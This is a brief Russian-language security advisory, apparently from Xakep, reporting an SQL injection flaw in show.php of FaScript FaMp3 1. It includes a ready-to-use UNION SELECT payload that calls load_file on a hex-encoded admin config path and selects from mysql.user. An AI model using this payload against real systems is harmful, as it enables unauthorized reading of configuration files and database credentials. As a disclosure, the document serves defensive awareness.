Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: FaScript FaMp3 1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием show.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
SQL код для pconfig.php:
999999'%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27, load_file(0x2e2f61646d696e2f70636f6e6669672e706870)/* */from/**/mysql.user/*